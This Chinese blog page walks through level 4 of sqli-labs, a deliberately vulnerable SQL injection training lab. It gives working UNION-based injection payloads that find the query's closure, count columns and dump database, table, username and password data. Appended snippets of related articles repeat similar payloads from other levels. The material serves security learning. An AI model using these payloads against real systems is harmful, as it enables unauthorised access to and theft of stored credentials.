sqli-labs系列——第四关

最新推荐文章于 2024-05-22 10:33:41 发布
最新推荐文章于 2024-05-22 10:33:41 发布
阅读量786 收藏 1
点赞数
分类专栏: sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51923959/article/details/112669398
版权

less4

第四关的sql语句是这样的:

select * from user where id=("$id");

?id=1")–+回显正常
在这里插入图片描述

order by 4报错,有3列
在这里插入图片描述union select 判断有无显示位

在这里插入图片描述

爆数据库名和列名:

?id=-1") union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

在这里插入图片描述

爆帐号和密码:

?id=0") union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+

在这里插入图片描述

也可以直接exp撸:

-1") union SELECT 1,2,(select group_concat(username,0x3a,password) from users)–+

那么执行的sql语句就是:

select * from user where id=("-1") union SELECT 1,2,(select group_concat(username,0x3a,password) from users)--+");

在这里插入图片描述

Drunkmars
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs靶场第四
gou1791241251的博客
12-19 1224
传入参数单引号页面显示正常,传入双引号时页面报错显示异常 第一步:判断注入类型,字符型还是数字型 由报错信息可知注入类型为双引号字符型。闭合方式是) and 1=1 --+时页面正常,and 1=2 --+时页面异常。说明闭合方式猜对了 ") 此时可以通过order by 来判断当前数据库表有多少个字段了 order by 3显示正常,order by 4显示异常,说明有三个字段。 可以通过union查询,查看页面回显位置 同样老套路查询一下当前数据库和当前版本号 通过information..
MySql复制一列到另一列
热门推荐
日拱一卒
12-14 1万+
mysql复制一列到另一列 UPDATE 表名 SET B列名=A列名 异表复制 需求一:把一个表某个字段内容复制到另一张表的某个字段 实现1: update B set extra = A.extra from A join B on (A.id = B.id); 实现2: update b set b.sms = (select a.sms from a where a.id = b.id...
sqli-labs---第四
最新发布
2201_75556700的博客
05-22 273
6、查询用户名和密码字段的值 ,用id分隔开方便观看。4、查询表名(有4张表,我们查询users这张表)3、查询数据库名(库名为security)可判断为字符型闭合,")为闭合方式。2、查询列数,判断回显位置。5、查询users字段。id=1'(正常回显)id=1(正常回显)
SQL注入学习总结
YouthBelief的博客
10-09 4595
SQL注入1.sql注入原理2.sql注入的分类3.sql注入可能出现的功能点4.判断是否存在sql注入Mysql注入常用函数一、联合查询注入二、报错注入三、布尔盲注四、时间盲注五、堆叠注入六、json注入5.sql注入的绕过测试环境总结 1.sql注入原理 web程序未对用户输入的数据进行严格的检查和过滤就拼接到后台的sql语句执行,从而被黑客利用进行数据库的增删查改或写入webshell。 2.sql注入的分类 根据数据类型分为:数字型、字符型、搜索型。 根据提交方式分为:get型 post型 c
sqli-labs第四
TA不懒,但还没有添加简介
09-08 442
sqli-labs第四 第四根据提示知道是基于双引号的错误,于是通过注入判断发现还有类似第三的问题 构造一下sql语句 select 1,2,3 from table where id=("$id") 所以需要在1’后面增加一个") 然后使用order by 或者select 判断字段个数 然后和第一、第二一样的办法获得表、字段、数据 第一二详细 第三 总结 找到合适的注入点,通过反馈信息构造语句。 ...
sqli-labs闯1-4
qq_44111282的博客
06-16 182
第一 首先进入卡后出现界面如下: 对目标url进行传参?id=1出现正常界面 尝试输入id=1 and 1=2发现页面回显正常,说明不是数值查询 接着输入id=1'发现页面回显和之前不一样,说明可能存在注入漏洞 接着输入id=1'--+发现页面回显正常,所以可以知道这里是字符型注入,这里的- -(空格)是在数据库表示的是注释的意思,后面的+是因为浏览器在发送请求时会自动将空格舍去,而+则会被转义为空格 接着进行字段数的尝试,输入id=1' order by 2--+页面
jeakinscheung-sqli-labs-php7-master.zip
03-16
在这个压缩包sqli-labs-php7可能包含一系列精心设计的练习,旨在帮助开发者理解和防御SQL注入攻击。通过这些练习,用户可以学习如何识别SQL注入的迹象,理解它们的工作原理,并掌握防御策略。在实践,这将提高...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sql-labs 闯 5~10
qq_44663230的博客
08-14 1473
sql-labs 第5~10 盲注系列
sqli-labs通攻略教程四(less 18~less-22)
m0_55854679的博客
07-11 265
sqli-labs通攻略教程二(less 1~less-17) less 18 与第一相同的步骤。首先在phpstudy打开网站根目录,在第一的index.php的文件加入两行代码echo $sql; echo "<br>";第一句意思是将我们构造的sql语句进行输出,第二句意思为换行符,方便我们浏览。 输入正确的用户名和密码,发现页面回显了IP地址,构造的sql语句和浏览器的使用版本一些信息.。若密码输入错误,则无浏览器版本的回显信息。 **注意:**如果你的密码输入admin
sqllab第四笔记
I_WORM的博客
03-13 456
构造payload:id=0")+union+select%201,2,3%20--+说明原始语句对输入的读取格式为 ("输入")好了,既然知道了语法信息,下面就开始注入。说明不是用单引号读取输入内容。回显出现了键信息‘)’默认单引号为字符串信息。
暑期练习web21:sqli lab赛1-4
qq_41618162的博客
08-23 371
经学长推荐准备刷一刷sqli lab这个闯赛,提高一波 第一 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 首先我们输入?id=1‘测试一下,于是就提示这里是有漏洞的,而且是一个字符型注入,最后面的limit 0,1要注意了,每次只显示一行 接着用order by测试字段数,直到3还是正常的,所以有三...
sqli-lab1到4详解
cangyu51462的博客
04-12 415
sqli-lab 1-4
sqli-libs攻略入门(1-4)
shijianyoulei6的博客
06-30 2693
从根本上讲,当开发人员对用户的输入过滤不严,造成了用户可以通过输入SQL语句控制数据库,就会产生SQL注入漏洞。 为了省时间,快速的学习了解SQL注入,这里使用Windows sever 2008 R2+phpstudy环境 首先需要在源代码添加这两个语句,使网页能够回显执行的有效sql语句 echo”有效输入”.$id.”<br>” echo”执行的sql语句”.$sql...
sqllibs靶场进阶(3)
ppbgi的博客
04-23 225
23------45链接 四十六
sqli-labs-master第一
05-19
sqli-labs-master是一个SQL注入练习平台,第一是一个基础的SQL注入练习。 首先,打开练习平台,找到第一的链接。在链接的末尾加上 `'`,观察页面的响应。如果页面存在SQL注入漏洞,那么会显示类似如下的错误信息: ``` You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 ``` 这意味着我们在SQL语句注入了一个单引号,导致MySQL服务器无法正确解析SQL语句。这也是SQL注入漏洞的典型表现。 接下来,我们可以尝试利用注入漏洞获取数据库的数据。在第一关中,我们需要获取 `users` 表的数据。因此,我们可以在链接的末尾加上以下语句: ```sql ' union select 1,2,3,4,5,6,7,8-- ``` 这个语句会在SQL语句插入一个 `union` 查询语句,用于查询 `users` 表的数据。`1` 到 `8` 是查询的字段数量,这里可以根据实际情况调整。双破折号 `--` 表示注释,用于避免语法错误。 将以上语句加到链接末尾后,点击访问链接,页面会显示类似以下内容的数据: ``` 1 2 3 4 5 6 7 8 1 admin 5f4dcc3b5aa765d61d8327deb882cf99 1 2 bob 202cb962ac59075b964b07152d234b70 0 ``` 其,第一行是查询结果的字段名,第二行开始是 `users` 表的数据。我们可以看到,这个表包含了两个用户的信息,其 `admin` 用户的密码经过了 MD5 加密。 这样,我们就成功地利用 SQL 注入漏洞获取数据库的数据,完成了第一的挑战。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值